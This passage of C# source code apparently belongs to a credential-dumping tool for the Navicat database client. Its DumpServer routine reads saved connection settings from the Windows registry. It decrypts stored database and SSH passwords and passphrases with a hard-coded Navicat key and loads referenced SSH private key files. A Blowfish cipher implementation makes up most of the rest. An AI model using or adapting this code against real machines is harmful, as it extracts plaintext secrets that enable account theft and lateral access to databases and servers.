return dt; 79 | } 80 | internal static void DumpServer(DataTable dt, Dictionary keyDict,RegistryKey key,string typName,string sername) 81 | { 82 | var host = key.GetValue("Host",""); 83 | var port = key.GetValue("Port",""); 84 | var user = key.GetValue("UserName"); 85 | var pwd = cipher.DecryptString(key.GetValue("Pwd","").ToString()); 86 | var usessh = key.GetValue("UseSSH", 0); 87 | string sshHost="",sshPort="",sshUser = "",sshPwd = "",sshPhrase = "",sshKey = ""; 88 | if (usessh is int && (int)usessh != 0) 89 | { 90 | sshHost = key.GetValue("SSH_Host","").ToString(); 91 | sshPort = key.GetValue("SSH_Port", 0).ToString(); 92 | sshUser = key.GetValue("SSH_UserName", "").ToString(); 93 | sshPwd = cipher.DecryptString(key.GetValue("SSH_Password", "").ToString()); 94 | sshPhrase = cipher.DecryptString(key.GetValue("SSH_Passphrase", "").ToString()); 95 | sshKey = key.GetValue("SSH_PrivateKey", "").ToString(); 96 | if (sshKey.Length != 0 && !keyDict.ContainsKey(sshKey) && File.Exists(sshKey) ) 97 | { 98 | keyDict[sshKey] = File.ReadAllText(sshKey); 99 | } 100 | 101 | 102 | } 103 | dt.Rows.Add(typName,sername, host,port,user,pwd,sshHost,sshPort,sshUser, sshPwd,sshPhrase, sshKey); 104 | } 105 | } 106 | internal class Navicat11Cipher 107 | { 108 | 109 | private BlowfishNavicat blowfishCipher; 110 | 111 | 112 | 113 | protected static void XorBytes(byte[] a, byte[] b, int len) 114 | { 115 | for (int i = 0; i < len; ++i) 116 | a[i] ^= b[i]; 117 | } 118 | 119 | public Navicat11Cipher() 120 | { 121 | byte[] UserKey = Encoding.UTF8.GetBytes("3DC5CA39"); 122 | var sha1 = new SHA1CryptoServiceProvider(); 123 | sha1.TransformFinalBlock(UserKey, 0, UserKey.Length); 124 | blowfishCipher = new BlowfishNavicat(sha1.Hash); 125 | } 126 | 127 | 128 | 129 | public string DecryptString(string ciphertext) 130 | { 131 | if (ciphertext.Length == 0) 132 | { 133 | return ""; 134 | } 135 | byte[] ciphertext_bytes = Utils.FromHex(ciphertext); 136 | 137 | byte[] CV = new byte[] { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF }; 138 | blowfishCipher.Encrypt(CV, BlowfishNavicat.Endian.Big); 139 | 140 | var ret = new MemoryStream(); 141 | int blocks_len = ciphertext_bytes.Length / BlowfishNavicat.BlockSize; 142 | int left_len = ciphertext_bytes.Length % BlowfishNavicat.BlockSize; 143 | byte[] temp = new byte[BlowfishNavicat.BlockSize]; 144 | byte[] temp2 = new byte[BlowfishNavicat.BlockSize]; 145 | for (int i = 0; i < blocks_len; ++i) 146 | { 147 | Array.Copy(ciphertext_bytes, BlowfishNavicat.BlockSize * i, temp, 0, BlowfishNavicat.BlockSize); 148 | Array.Copy(temp, temp2, BlowfishNavicat.BlockSize); 149 | blowfishCipher.Decrypt(temp, BlowfishNavicat.Endian.Big); 150 | XorBytes(temp, CV, BlowfishNavicat.BlockSize); 151 | ret.Write(temp, 0, temp.Length); 152 | XorBytes(CV, temp2, BlowfishNavicat.BlockSize); 153 | } 154 | 155 | if (left_len != 0) 156 | { 157 | Array.Clear(temp, 0, temp.Length); 158 | Array.Copy(ciphertext_bytes, BlowfishNavicat.BlockSize * blocks_len, temp, 0, left_len); 159 | blowfishCipher.Encrypt(CV, BlowfishNavicat.Endian.Big); 160 | XorBytes(temp, CV, BlowfishNavicat.BlockSize); 161 | ret.Write(temp,0,left_len); 162 | } 163 | 164 | return Encoding.UTF8.GetString(ret.ToArray()); 165 | } 166 | } 167 | internal class BlowfishNavicat 168 | { 169 | 170 | public enum Endian { Little, Big }; 171 | public static readonly int MinUserKeyLength = 1; 172 | public static readonly int MaxUserKeyLength = 56; 173 | public static readonly int BlockSize = 8; 174 | 175 | private static readonly UInt32[] OriginPBox = new UInt32[] { 176 | 0x243F6A88, 0x85A308D3, 0x13198A2E, 0x03707344, 0xA4093822, 0x299F31D0, 177 | 0x082EFA98, 0xEC4E6C89, 0x452821E6, 0x38D01377, 0xBE5466CF, 0x34E90C6C, 178 | 0xC0AC29B7, 0xC97C50DD, 0x3F84D5B5, 0xB5470917, 0x9216D5D9, 0x8979FB1B 179 | }; 180 | 181 | private static readonly UInt32[,] OriginSBox = new UInt32[4, 256] { 182 | { 183 | 0xD1310BA6, 0x98DFB5AC, 0x2FFD72DB, 0xD01ADFB7, 0xB8E1AFED, 0x6A267E96, 0xBA7C9045, 0xF12C7F99, 0x24A19947, 0xB3916CF7, 0x0801F2E2, 0x858EFC16, 0x636920D8, 0x71574E69, 0xA458FEA3, 0xF4933D7E, 184 | 0x0D95748F, 0x728EB658, 0x718BCD58, 0x82154AEE, 0x7B54A41D, 0xC25A59B5, 0x9C30D539, 0x2AF26013, 0xC5D1B023, 0x286085F0, 0xCA417918, 0xB8DB38EF, 0x8E79DCB0, 0x603A180E, 0x6C9E0E8B, 0xB01E8A3E, 185 | 0xD71577C1, 0xBD314B27, 0x78AF2FDA, 0x55605C60, 0xE65525F3, 0xAA55AB94, 0x57489862, 0x63E81440, 0x55CA396A, 0x2AAB10B6, 0xB4CC5C34, 0x1141E8CE, 0xA15486AF, 0x7C72E993, 0xB3EE1411, 0x636FBC2A, 186 | 0x2BA9C55D, 0x741831F6, 0xCE5C3E16, 0x9B87931E, 0xAFD6BA33, 0x6C24CF5C, 0x7A325381, 0x28958677, 0x3B8F4898, 0x6B4BB9AF, 0xC4BFE81B, 0x66282193, 0x61D809CC, 0xFB21A991, 0x487CAC60, 0x5DEC8032, 187 | 0xEF845D5D, 0xE98575B1, 0xDC262302, 0xEB651B88, 0x23893E81, 0xD396ACC5, 0x0F6D6FF3, 0x83F44239, 0x2E0B4482, 0xA4842004, 0x69C8F04A, 0x9E1F9B5E, 0x21C66842, 0xF6E96C9A, 0x670C9C61, 0xABD388F0, 188 | 0x6A51A0D2, 0xD8542F68, 0x960FA728, 0xAB5133A3, 0x6EEF0B6C, 0x137A3BE4, 0xBA3BF050, 0x7EFB2A98, 0xA1F1651D, 0x39AF0176, 0x66CA593E, 0x82430E88, 0x8CEE8619, 0x456F9FB4, 0x7D84A5C3, 0x3B8B5EBE, 189 | 0xE06F75D8, 0x85C12073, 0x401A449F, 0x56C16AA6, 0x4ED3AA62, 0x363F7706, 0x1BFEDF72, 0x429B023D, 0x37D0D724, 0xD00A1248, 0xDB0FEAD3, 0x49F1C09B, 0x075372C9, 0x80991B7B, 0x25D479D8, 0xF6E8DEF7, 190 | 0xE3FE501A, 0xB6794C3B, 0x976CE0BD, 0x04C006BA, 0xC1A94FB6, 0x409F60C4, 0x5E5C9EC2, 0x196A2463, 0x68FB6FAF, 0x3E6C53B5, 0x1339B2EB, 0x3B52EC6F, 0x6DFC511F, 0x9B30952C, 0xCC814544, 0xAF5EBD09, 191 | 0xBEE3D004, 0xDE334AFD, 0x660F2807, 0x192E4BB3, 0xC0CBA857, 0x45C8740F, 0xD20B5F39, 0xB9D3FBDB, 0x5579C0BD, 0x1A60320A, 0xD6A100C6, 0x402C7279, 0x679F25FE, 0xFB1FA3CC, 0x8EA5E9F8, 0xDB3222F8, 192 | 0x3C7516DF, 0xFD616B15, 0x2F501EC8, 0xAD0552AB, 0x323DB5FA, 0xFD238760, 0x53317B48, 0x3E00DF82, 0x9E5C57BB, 0xCA6F8CA0, 0x1A87562E, 0xDF1769DB, 0xD542A8F6, 0x287EFFC3, 0xAC6732C6, 0x8C4F5573, 193 | 0x695B27B0, 0xBBCA58C8, 0xE1FFA35D, 0xB8F011A0, 0x10FA3D98, 0xFD2183B8, 0x4AFCB56C, 0x2DD1D35B, 0x9A53E479, 0xB6F84565, 0xD28E49BC, 0x4BFB9790, 0xE1DDF2DA, 0xA4CB7E33, 0x62FB1341, 0xCEE4C6E8, 194 | 0xEF20CADA, 0x36774C01, 0xD07E9EFE, 0x2BF11FB4, 0x95DBDA4D, 0xAE909198, 0xEAAD8E71, 0x6B93D5A0, 0xD08ED1D0, 0xAFC725E0, 0x8E3C5B2F, 0x8E7594B7, 0x8FF6E2FB, 0xF2122B64, 0x8888B812, 0x900DF01C, 195 | 0x4FAD5EA0, 0x688FC31C, 0xD1CFF191, 0xB3A8C1AD, 0x2F2F2218, 0xBE0E1777, 0xEA752DFE, 0x8B021FA1, 0xE5A0CC0F, 0xB56F74E8, 0x18ACF3D6, 0xCE89E299, 0xB4A84FE0, 0xFD13E0B7, 0x7CC43B81, 0xD2ADA8D9, 196 | 0x165FA266, 0x80957705, 0x93CC7314, 0x211A1477, 0xE6AD2065, 0x77B5FA86, 0xC75442F5, 0xFB9D35CF, 0xEBCDAF0C, 0x7B3E89A0, 0xD6411BD3, 0xAE1E7E49, 0x00250E2D, 0x2071B35E, 0x226800BB, 0x57B8E0AF, 197 | 0x2464369B, 0xF009B91E, 0x5563911D, 0x59DFA6AA, 0x78C14389, 0xD95A537F, 0x207D5BA2, 0x02E5B9C5, 0x83260376, 0x6295CFA9, 0x11C81968, 0x4E734A41, 0xB3472DCA, 0x7B14A94A, 0x1B510052, 0x9A532915, 198 | 0xD60F573F, 0xBC9BC6E4, 0x2B60A476, 0x81E67400, 0x08BA6FB5, 0x571BE91F, 0xF296EC6B, 0x2A0DD915, 0xB6636521, 0xE7B9F9B6, 0xFF34052E, 0xC5855664, 0x53B02D5D, 0xA99F8FA1, 0x08BA4799, 0x6E85076A 199 | }, 200 | 201 | { 202 | 0x4B7A70E9, 0xB5B32944, 0xDB75092E, 0xC4192623, 0xAD6EA6B0, 0x49A7DF7D, 0x9CEE60B8, 0x8FEDB266, 0xECAA8C71, 0x699A17FF, 0x5664526C, 0xC2B19EE1, 0x193602A5, 0x75094C29, 0xA0591340, 0xE4183A3E, 203 | 0x3F54989A, 0x5B429D65, 0x6B8FE4D6, 0x99F73FD6, 0xA1D29C07, 0xEFE830F5, 0x4D2D38E6, 0xF0255DC1, 0x4CDD2086, 0x8470EB26, 0x6382E9C6, 0x021ECC5E, 0x09686B3F, 0x3EBAEFC9, 0x3C971814, 0x6B6A70A1, 204 | 0x687F3584, 0x52A0E286, 0xB79C5305, 0xAA500737, 0x3E07841C, 0x7FDEAE5C, 0x8E7D44EC, 0x5716F2B8, 0xB03ADA37, 0xF0500C0D, 0xF01C1F04, 0x0200B3FF, 0xAE0CF51A, 0x3CB574B2, 0x25837A58, 0xDC0921BD, 205 | 0xD19113F9, 0x7CA92FF6, 0x94324773, 0x22F54701, 0x3AE5E581, 0x37C2DADC, 0xC8B57634, 0x9AF3DDA7, 0xA9446146, 0x0FD0030E, 0xECC8C73E, 0xA4751E41, 0xE238CD99, 0x3BEA0E2F, 0x3280BBA1, 0x183EB331, 206 | 0x4E548B38, 0x4F6DB908, 0x6F420D03, 0xF60A04BF, 0x2CB81290, 0x24977C79, 0x5679B072, 0xBCAF89AF, 0xDE9A771F, 0xD9930810, 0xB38BAE12, 0xDCCF3F2E, 0x5512721F, 0x2E6B7124, 0x501ADDE6, 0x9F84CD87, 207 | 0x7A584718, 0x7408DA17, 0xBC9F9ABC, 0xE94B7D8C, 0xEC7AEC3A, 0xDB851DFA, 0x63094366, 0xC464C3D2, 0xEF1C1847, 0x3215D908, 0xDD433B37, 0x24C2BA16, 0x12A14D43, 0x2A65C451, 0x50940002, 0x133AE4DD, 208 | 0x71DFF89E, 0x10314E55, 0x81AC77D6, 0x5F11199B, 0x043556F1, 0xD7A3C76B, 0x3C11183B, 0x5924A509, 0xF28FE6ED, 0x97F1FBFA, 0x9EBABF2C, 0x1E153C6E, 0x86E34570, 0xEAE96FB1, 0x860E5E0A, 0x5A3E2AB3, 209 | 0x771FE71C, 0x4E3D06FA, 0x2965DCB9, 0x99E71D0F, 0x803E89D6, 0x5266C825, 0x2E4CC978, 0x9C10B36A, 0xC6150EBA, 0x94E2EA78, 0xA5FC3C53, 0x1E0A2DF4, 0xF2F74EA7, 0x361D2B3D, 0x1939260F, 0x19C27960, 210 | 0x5223A708, 0xF71312B6, 0xEBADFE6E, 0xEAC31F66, 0xE3BC4595, 0xA67BC883, 0xB17F37D1, 0x018CFF28, 0xC332DDEF, 0xBE6C5AA5, 0x65582185, 0x68AB9802, 0xEECEA50F, 0xDB2F953B, 0x2AEF7DAD, 0x5B6E2F84, 211 | 0x1521B628, 0x29076170, 0xECDD4775, 0x619F1510, 0x13CCA830, 0xEB61BD96, 0x0334FE1E, 0xAA0363CF, 0xB5735C90, 0x4C70A239, 0xD59E9E0B, 0xCBAADE14, 0xEECC86BC, 0x60622CA7, 0x9CAB5CAB, 0xB2F3846E, 212 | 0x648B1EAF, 0x19BDF0CA, 0xA02369B9, 0x655ABB50, 0x40685A32, 0x3C2AB4B3, 0x319EE9D5, 0xC021B8F7, 0x9B540B19, 0x875FA099, 0x95F7997E, 0x623D7DA8, 0xF837889A, 0x97E32D77, 0x11ED935F, 0x16681281, 213 | 0x0E358829, 0xC7E61FD6, 0x96DEDFA1, 0x7858BA99, 0x57F584A5, 0x1B227263, 0x9B83C3FF, 0x1AC24696, 0xCDB30AEB, 0x532E3054, 0x8FD948E4, 0x6DBC3128, 0x58EBF2EF, 0x34C6FFEA, 0xFE28ED61, 0xEE7C3C73, 214 | 0x5D4A14D9, 0xE864B7E3, 0x42105D14, 0x203E13E0, 0x45EEE2B6, 0xA3AAABEA, 0xDB6C4F15, 0xFACB4FD0, 0xC742F442, 0xEF6ABBB5, 0x654F3B1D, 0x41CD2105, 0xD81E799E, 0x86854DC7, 0xE44B476A, 0x3D816250, 215 | 0xCF62A1F2, 0x5B8D2646, 0xFC8883A0, 0xC1C7B6A3, 0x7F1524C3, 0x69CB7492, 0x47848A0B, 0x5692B285, 0x095BBF00, 0xAD19489D, 0x1462B174, 0x23820E00, 0x58428D2A, 0x0C55F5EA, 0x1DADF43E, 0x233F7061, 216 | 0x3372F092, 0x8D937E41, 0xD65FECF1, 0x6C223BDB, 0x7CDE3759, 0xCBEE7460, 0x4085F2A7, 0xCE77326E, 0xA6078084, 0x19F8509E, 0xE8EFD855, 0x61D99735, 0xA969A7AA, 0xC50C06C2, 0x5A04ABFC, 0x800BCADC, 217 | 0x9E447A2E, 0xC3453484, 0xFDD56705, 0x0E1E9EC9, 0xDB73DBD3, 0x105588CD, 0x675FDA79, 0xE3674340, 0xC5C43465, 0x713E38D8, 0x3D28F89E, 0xF16DFF20, 0x153E21E7, 0x8FB03D4A, 0xE6E39F2B, 0xDB83ADF7 218 | }, 219 | 220 | { 221 | 0xE93D5A68, 0x948140F7, 0xF64C261C, 0x94692934, 0x411520F7, 0x7602D4F7, 0xBCF46B2E, 0xD4A20068, 0xD4082471, 0x3320F46A, 0x43B7D4B7, 0x500061AF, 0x1E39F62E, 0x97244546, 0x14214F74, 0xBF8B8840, 222 | 0x4D95FC1D, 0x96B591AF, 0x70F4DDD3, 0x66A02F45, 0xBFBC09EC, 0x03BD9785, 0x7FAC6DD0, 0x31CB8504, 0x96EB27B3, 0x55FD3941, 0xDA2547E6, 0xABCA0A9A, 0x28507825, 0x530429F4, 0x0A2C86DA, 0xE9B66DFB, 223 | 0x68DC1462, 0xD7486900, 0x680EC0A4, 0x27A18DEE, 0x4F3FFEA2, 0xE887AD8C, 0xB58CE006, 0x7AF4D6B6, 0xAACE1E7C, 0xD3375FEC, 0xCE78A399, 0x406B2A42, 0x20FE9E35, 0xD9F385B9, 0xEE39D7AB, 0x3B124E8B, 224 | 0x1DC9FAF7, 0x4B6D1856, 0x26A36631, 0xEAE397B2, 0x3A6EFA74, 0xDD5B4332, 0x6841E7F7, 0xCA7820FB, 0xFB0AF54E, 0xD8FEB397, 0x454056AC, 0xBA489527, 0x55533A3A, 0x20838D87, 0xFE6BA9B7, 0xD096954B, 225 | 0x55A867BC, 0xA1159A58, 0xCCA92963, 0x99E1DB33, 0xA62A4A56, 0x3F3125F9, 0x5EF47E1C, 0x9029317C, 0xFDF8E802, 0x04272F70, 0x80BB155C, 0x05282CE3, 0x95C11548, 0xE4C66D22, 0x48C1133F, 0xC70F86DC, 226 | 0x07F9C9EE, 0x41041F0F, 0x404779A4, 0x5D886E17, 0x325F51EB, 0xD59BC0D1, 0xF2BCC18F, 0x41113564, 0x257B7834, 0x602A9C60, 0xDFF8E8A3, 0x1F636C1B, 0x0E12B4C2, 0x02E1329E, 0xAF664FD1, 0xCAD18115, 227 | 0x6B2395E0, 0x333E92E1, 0x3B240B62, 0xEEBEB922, 0x85B2A20E, 0xE6BA0D99, 0xDE720C8C, 0x2DA2F728, 0xD0127845, 0x95B794FD, 0x647D0862, 0xE7CCF5F0, 0x5449A36F, 0x877D48FA, 0xC39DFD27, 0xF33E8D1E, 228 | 0x0A476341, 0x992EFF74, 0x3A6F6EAB, 0xF4F8FD37, 0xA812DC60, 0xA1EBDDF8, 0x991BE14C, 0xDB6E6B0D, 0xC67B5510, 0x6D672C37, 0x2765D43B, 0xDCD0E804, 0xF1290DC7, 0xCC00FFA3, 0xB5390F92, 0x690FED0B, 229 | 0x667B9FFB, 0xCEDB7D9C, 0xA091CF0B, 0xD9155EA3, 0xBB132F88, 0x515BAD24, 0x7B9479BF, 0x763BD6EB, 0x37392EB3, 0xCC115979, 0x8026E297, 0xF42E312D, 0x6842ADA7, 0xC66A2B3B, 0x12754CCC, 0x782EF11C, 230 | 0x6A124237, 0xB79251E7, 0x06A1BBE6, 0x4BFB6350, 0x1A6B1018, 0x11CAEDFA, 0x3D25BDD8, 0xE2E1C3C9, 0x44421659, 0x0A121386, 0xD90CEC6E, 0xD5ABEA2A, 0x64AF674E, 0xDA86A85F, 0xBEBFE988, 0x64E4C3FE, 231 | 0x9DBC8057, 0xF0F7C086, 0x60787BF8, 0x6003604D, 0xD1FD8346, 0xF6381FB0, 0x7745AE04, 0xD736FCCC, 0x83426B33, 0xF01EAB71, 0xB0804187, 0x3C005E5F, 0x77A057BE, 0xBDE8AE24, 0x55464299, 0xBF582E61, 232 | 0x4E58F48F, 0xF2DDFDA2, 0xF474EF38, 0x8789BDC2, 0x5366F9C3, 0xC8B38E74, 0xB475F255, 0x46FCD9B9, 0x7AEB2661, 0x8B1DDF84, 0x846A0E79, 0x915F95E2, 0x466E598E, 0x20B45770, 0x8CD55591, 0xC902DE4C, 233 | 0xB90BACE1, 0xBB8205D0, 0x11A86248, 0x7574A99E, 0xB77F19B6, 0xE0A9DC09, 0x662D09A1, 0xC4324633, 0xE85A1F02, 0x09F0BE8C, 0x4A99A025, 0x1D6EFE10, 0x1AB93D1D, 0x0BA5A4DF, 0xA186F20F, 0x2868F169, 234 | 0xDCB7DA83, 0x573906FE, 0xA1E2CE9B, 0x4FCD7F52, 0x50115E01, 0xA70683FA, 0xA002B5C4, 0x0DE6D027, 0x9AF88C27, 0x773F8641, 0xC3604C06, 0x61A806B5, 0xF0177A28, 0xC0F586E0, 0x006058AA, 0x30DC7D62, 235 | 0x11E69ED7, 0x2338EA63, 0x53C2DD94, 0xC2C21634, 0xBBCBEE56, 0x90BCB6DE, 0xEBFC7DA1, 0xCE591D76, 0x6F05E409, 0x4B7C0188, 0x39720A3D, 0x7C927C24, 0x86E3725F, 0x724D9DB9, 0x1AC15BB4, 0xD39EB8FC, 236 | 0xED545578, 0x08FCA5B5, 0xD83D7CD3, 0x4DAD0FC4, 0x1E50EF5E, 0xB161E6F8, 0xA28514D9, 0x6C51133C, 0x6FD5C7E7, 0x56E14EC4, 0x362ABFCE, 0xDDC6C837, 0xD79A3234, 0x92638212, 0x670EFA8E, 0x406000E0 237 | }, 238 | 239 | { 240 | 0x3A39CE37, 0xD3FAF5CF, 0xABC27737, 0x5AC52D1B, 0x5CB0679E, 0x4FA33742, 0xD3822740, 0x99BC9BBE, 0xD5118E9D, 0xBF0F7315, 0xD62D1C7E, 0xC700C47B, 0xB78C1B6B, 0x21A19045, 0xB26EB1BE, 0x6A366EB4, 241 | 0x5748AB2F, 0xBC946E79, 0xC6A376D2, 0x6549C2C8, 0x530FF8EE, 0x468DDE7D, 0xD5730A1D, 0x4CD04DC6, 0x2939BBDB, 0xA9BA4650, 0xAC9526E8, 0xBE5EE304, 0xA1FAD5F0, 0x6A2D519A, 0x63EF8CE2, 0x9A86EE22, 242 | 0xC089C2B8, 0x43242EF6, 0xA51E03AA, 0x9CF2D0A4, 0x83C061BA, 0x9BE96A4D, 0x8FE51550, 0xBA645BD6, 0x2826A2F9, 0xA73A3AE1, 0x4BA99586, 0xEF5562E9, 0xC72FEFD3, 0xF752F7DA, 0x3F046F69, 0x77FA0A59, 243 | 0x80E4A915, 0x87B08601, 0x9B09E6AD, 0x3B3EE593, 0xE990FD5A, 0x9E34D797, 0x2CF0B7D9, 0x022B8B51, 0x96D5AC3A, 0x017DA67D, 0xD1CF3ED6, 0x7C7D2D28, 0x1F9F25CF, 0xADF2B89B, 0x5AD6B472, 0x5A88F54C, 244 | 0xE029AC71, 0xE019A5E6, 0x47B0ACFD, 0xED93FA9B, 0xE8D3C48D, 0x283B57CC, 0xF8D56629, 0x79132E28, 0x785F0191, 0xED756055, 0xF7960E44, 0xE3D35E8C, 0x15056DD4, 0x88F46DBA, 0x03A16125, 0x0564F0BD, 245 | 0xC3EB9E15, 0x3C9057A2, 0x97271AEC, 0xA93A072A, 0x1B3F6D9B, 0x1E6321F5, 0xF59C66FB, 0x26DCF319, 0x7533D928, 0xB155FDF5, 0x03563482, 0x8ABA3CBB, 0x28517711, 0xC20AD9F8, 0xABCC5167, 0xCCAD925F, 246 | 0x4DE81751, 0x3830DC8E, 0x379D5862, 0x9320F991, 0xEA7A90C2, 0xFB3E7BCE, 0x5121CE64, 0x774FBE32, 0xA8B6E37E, 0xC3293D46, 0x48DE5369, 0x6413E680, 0xA2AE0810, 0xDD6DB224, 0x69852DFD, 0x09072166, 247 | 0xB39A460A, 0x6445C0DD, 0x586CDECF, 0x1C20C8AE, 0x5BBEF7DD, 0x1B588D40, 0xCCD2017F, 0x6BB4E3BB, 0xDDA26A7E, 0x3A59FF45, 0x3E350A44, 0xBCB4CDD5, 0x72EACEA8, 0xFA6484BB, 0x8D6612AE, 0xBF3C6F47, 248 | 0xD29BE463, 0x542F5D9E, 0xAEC2771B, 0xF64E6370, 0x740E0D8D, 0xE75B1357, 0xF8721671, 0xAF537D5D, 0x4040CB08, 0x4EB4E2CC, 0x34D2466A, 0x0115AF84, 0xE1B00428, 0x95983A1D, 0x06B89FB4, 0xCE6EA048, 249 | 0x6F3F3B82, 0x3520AB82, 0x011A1D4B, 0x277227F8, 0x611560B1, 0xE7933FDC, 0xBB3A792B, 0x344525BD, 0xA08839E1, 0x51CE794B, 0x2F32C9B7, 0xA01FBAC9, 0xE01CC87E, 0xBCC7D1F6, 0xCF0111C3, 0xA1E8AAC7, 250 | 0x1A908749, 0xD44FBD9A, 0xD0DADECB, 0xD50ADA38, 0x0339C32A, 0xC6913667, 0x8DF9317C, 0xE0B12B4F, 0xF79E59B7, 0x43F5BB3A, 0xF2D519FF, 0x27D9459C, 0xBF97222C, 0x15E6FC2A, 0x0F91FC71, 0x9B941525, 251 | 0xFAE59361, 0xCEB69CEB, 0xC2A86459, 0x12BAA8D1, 0xB6C1075E, 0xE3056A0C, 0x10D25065, 0xCB03A442, 0xE0EC6E0E, 0x1698DB3B, 0x4C98A0BE, 0x3278E964, 0x9F1F9532, 0xE0D392DF, 0xD3A0342B, 0x8971F21E, 252 | 0x1B0A7441, 0x4BA3348C, 0xC5BE7120, 0xC37632D8, 0xDF359F8D, 0x9B992F2E, 0xE60B6F47, 0x0FE3F11D, 0xE54CDA54, 0x1EDAD891, 0xCE6279CF, 0xCD3E7E6F, 0x1618B166, 0xFD2C1D05, 0x848FD2C5, 0xF6FB2299, 253 | 0xF523F357, 0xA6327623, 0x93A83531, 0x56CCCD02, 0xACF08162, 0x5A75EBB5, 0x6E163697, 0x88D273CC, 0xDE966292, 0x81B949D0, 0x4C50901B, 0x71C65614, 0xE6C6C7BD, 0x327A140A, 0x45E1D006, 0xC3F27B9A, 254 | 0xC9AA53FD, 0x62A80F00, 0xBB25BFE2, 0x35BDD2F6, 0x71126905, 0xB2040222, 0xB6CBCF7C, 0xCD769C2B, 0x53113EC0, 0x1640E3D3, 0x38ABBD60, 0x2547ADF0, 0xBA38209C, 0xF746CE76, 0x77AFA1C5, 0x20756060, 255 | 0x85CBFE4E, 0x8AE88DD8, 0x7AAAF9B0, 0x4CF9AA7E, 0x1948C25C, 0x02FB8A8C, 0x01C36AE4, 0xD6EBE1F9, 0x90D4F869, 0xA65CDEA0, 0x3F09252D, 0xC208E69F, 0xB74E6132, 0xCE77E25B, 0x578FDFE3, 0x3AC372E6 256 | } 257 | }; 258 | 259 | private UInt32[] SubKey; 260 | private UInt32[,] SBox; 261 | 262 | private UInt32 _F_Transform(UInt32 x) 263 | { 264 | byte[] x_bytes = BitConverter.GetBytes(x); 265 | if (BitConverter.IsLittleEndian == false) 266 | Array.Reverse(x_bytes); 267 | return ((SBox[0, x_bytes[3]] + SBox[1, x_bytes[2]]) ^ SBox[2, x_bytes[1]]) + SBox[3, x_bytes[0]]; 268 | } 269 | 270 | public void Encrypt(byte[] srcBytes, Endian endian) 271 | { 272 | byte[] L_bytes = new byte[4]; 273 | byte[] R_bytes = new byte[4]; 274 | Array.Copy(srcBytes, 0, L_bytes, 0, 4); 275 | Array.Copy(srcBytes, 4, R_bytes, 0, 4); 276 | 277 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 278 | { 279 | Array.Reverse(L_bytes); 280 | Array.Reverse(R_bytes); 281 | } 282 | 283 | UInt32 L = BitConverter.ToUInt32(L_bytes, 0); 284 | UInt32 R = BitConverter.ToUInt32(R_bytes, 0); 285 | 286 | L ^= SubKey[0]; 287 | R ^= _F_Transform(L); 288 | 289 | R ^= SubKey[1]; 290 | L ^= _F_Transform(R); 291 | 292 | L ^= SubKey[2]; 293 | R ^= _F_Transform(L); 294 | 295 | R ^= SubKey[3]; 296 | L ^= _F_Transform(R); 297 | 298 | L ^= SubKey[4]; 299 | R ^= _F_Transform(L); 300 | 301 | R ^= SubKey[5]; 302 | L ^= _F_Transform(R); 303 | 304 | L ^= SubKey[6]; 305 | R ^= _F_Transform(L); 306 | 307 | R ^= SubKey[7]; 308 | L ^= _F_Transform(R); 309 | 310 | L ^= SubKey[8]; 311 | R ^= _F_Transform(L); 312 | 313 | R ^= SubKey[9]; 314 | L ^= _F_Transform(R); 315 | 316 | L ^= SubKey[10]; 317 | R ^= _F_Transform(L); 318 | 319 | R ^= SubKey[11]; 320 | L ^= _F_Transform(R); 321 | 322 | L ^= SubKey[12]; 323 | R ^= _F_Transform(L); 324 | 325 | R ^= SubKey[13]; 326 | L ^= _F_Transform(R); 327 | 328 | L ^= SubKey[14]; 329 | R ^= _F_Transform(L); 330 | 331 | R ^= SubKey[15]; 332 | L ^= _F_Transform(R); 333 | 334 | L ^= SubKey[16]; 335 | R ^= SubKey[17]; 336 | 337 | L_bytes = BitConverter.GetBytes(R); 338 | R_bytes = BitConverter.GetBytes(L); 339 | 340 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 341 | { 342 | Array.Reverse(L_bytes); 343 | Array.Reverse(R_bytes); 344 | } 345 | 346 | Array.Copy(L_bytes, 0, srcBytes, 0, 4); 347 | Array.Copy(R_bytes, 0, srcBytes, 4, 4); 348 | } 349 | 350 | public void Decrypt(byte[] srcBytes, Endian endian) 351 | { 352 | byte[] L_bytes = new byte[4]; 353 | byte[] R_bytes = new byte[4]; 354 | Array.Copy(srcBytes, 0, L_bytes, 0, 4); 355 | Array.Copy(srcBytes, 4, R_bytes, 0, 4); 356 | 357 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 358 | { 359 | Array.Reverse(L_bytes); 360 | Array.Reverse(R_bytes); 361 | } 362 | 363 | UInt32 L = BitConverter.ToUInt32(R_bytes, 0); 364 | UInt32 R = BitConverter.ToUInt32(L_bytes, 0); 365 | 366 | L ^= SubKey[16]; 367 | R ^= SubKey[17]; 368 | 369 | L ^= _F_Transform(R); 370 | R ^= SubKey[15]; 371 | 372 | R ^= _F_Transform(L); 373 | L ^= SubKey[14]; 374 | 375 | L ^= _F_Transform(R); 376 | R ^= SubKey[13]; 377 | 378 | R ^= _F_Transform(L); 379 | L ^= SubKey[12]; 380 | 381 | L ^= _F_Transform(R); 382 | R ^= SubKey[11]; 383 | 384 | R ^= _F_Transform(L); 385 | L ^= SubKey[10]; 386 | 387 | L ^= _F_Transform(R); 388 | R ^= SubKey[9]; 389 | 390 | R ^= _F_Transform(L); 391 | L ^= SubKey[8]; 392 | 393 | L ^= _F_Transform(R); 394 | R ^= SubKey[7]; 395 | 396 | R ^= _F_Transform(L); 397 | L ^= SubKey[6]; 398 | 399 | L ^= _F_Transform(R); 400 | R ^= SubKey[5]; 401 | 402 | R ^= _F_Transform(L); 403 | L ^= SubKey[4]; 404 | 405 | L ^= _F_Transform(R); 406 | R ^= SubKey[3]; 407 | 408 | R ^= _F_Transform(L); 409 | L ^= SubKey[2]; 410 | 411 | L ^= _F_Transform(R); 412 | R ^= SubKey[1]; 413 | 414 | R ^= _F_Transform(L); 415 | L ^= SubKey[0]; 416 | 417 | L_bytes = BitConverter.GetBytes(L); 418 | R_bytes = BitConverter.GetBytes(R); 419 | 420 | if (BitConverter.IsLittleEndian && endian == Endian.Big || BitConverter.IsLittleEndian == false && endian == Endian.Little) 421 | { 422 | Array.Reverse(L_bytes); 423 | Array.Reverse(R_bytes); 424 | } 425 | 426 | Array.Copy(L_bytes, 0, srcBytes, 0, 4); 427 | Array.Copy(R_bytes, 0, srcBytes, 4, 4); 428 | } 